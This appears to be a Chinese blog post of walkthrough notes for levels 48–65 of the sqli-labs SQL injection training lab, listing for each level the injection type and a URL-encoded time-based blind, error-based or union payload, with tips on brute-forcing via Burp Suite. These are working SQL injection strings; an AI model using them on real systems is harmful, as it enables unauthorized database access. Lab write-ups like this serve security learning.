本文主要是介绍sqllab第48-65关通关笔记,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
48关知识点:
- 数值型注入
- 时间盲注
- payload:sort=1%20and%20if((mid(database(),1,1)=%27a%27),sleep(3),0)=1
- 利用bp抓包放到爆破模块中进行爆破
49关知识点:
- 字符型注入
- 时间盲注
- payload:sort=1'%20and%20if((mid(database(),1,1)=%27a%27),sleep(3),0)='1
- 利用bp抓包放到爆破模块中进行爆破
50关知识点:
- 数值型注入
- 报错注入
- payload:sort=1%20and%20extractvalue(1,concat(0x7e,database(),0x7e))
- 时间盲注
51关知识点:
- 字符型注入
- 报错注入
- payload:sort=1%27and%20extractvalue(1,concat(0x7e,database(),0x7e))=%27
52关知识点:
- 数值型注入
- 时间盲注
- payload:sort=1%20and%20if((mid(database(),1,1)=%27a%27),sleep(1),0)
- 通过bp进行爆破处数据库信息
53关知识点:
- 字符型注入
- 时间盲注
- payload:sort=1%27and%20if((mid(database(),1,1)=%27s%27),sleep(1),0)=%271
- 通过bp进行爆破
54关知识点:
- 字符型注入
- 单纯的单引号闭合
- 联合注入
- payload:id=0%27%20union%20select%201,database(),3%20%27
- 获取数据库名后可以尝试获取表名、字段名和数据(5次以内就能找到密钥)
55关知识点:
- 数值型注入
- 括号闭合 (id)
- 联合注入
- payload:id=0)%20union%20select%201,database(),3%20--+
- 获取数据库名后可以尝试获取表名、字段名和数据信息
56关知识点:
- 字符型注入
- 单引号+括号闭合
- 联合注入
- payload:id=0%27)union%20select%201,database(),3%20--+
- 同上
57关知识点:
- 字符型注入
- 双引号闭合
- 联合注入
- payload:id=0"%20union%20select%201,database(),3%20"
- 同上
58关知识点:
- 字符型注入
- 单引号闭合
- 报错注入
- payload:id=1%27 and extractvalue(1,concat(0x7e,database(),0x7e))=1 --+
- 接着可以进行表名、字段名、数据信息的读取
59关知识点:
- 数值型注入
- 报错注入
- payload:id=1%20and%20extractvalue(1,concat(0x7e,database(),0x7e))
60关知识点:
- 字符型注入
- 双引号+括号注入
- 报错注入
- payload:id=1")%20and%20extractvalue(1,concat(0x7e,database(),0x7e))%20--+
61关知识点:
- 字符型注入
- 单引号+双括号闭合
- 报错注入
- payload:id=1%27))%20and%20extractvalue(1,concat(0x7e,database(),0x7e))%20--+
62关知识点:
- 字符型注入
- 单引号+括号闭合
- 时间盲注
- payload:id=1%27)%20and%20if((mid(database(),1,1)=%27c%27),sleep(1),0)=0%20--+
- 如果爆破的话把sleep()时间设久一点儿,方便过滤
63关知识点:
- 字符型注入
- 单引号闭合
- 时间盲注
- payload:id=1%27%20and%20if((mid(database(),1,1)=%27c%27),sleep(1),0)=0--+
- 同上
64关知识点:
- 数值型注入
- 时间盲注
- payload:id=1%20and%20if((mid(database(),1,1)=%27c%27),sleep(2),0)=0%20
65关知识点:
- 字符型注入
- 双引号+括号闭合
- 时间盲注
- payload:id=1")%20and%20if((mid(database(),1,1)=%27c%27),sleep(1),0)=0%20--+
10
这篇关于sqllab第48-65关通关笔记的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!
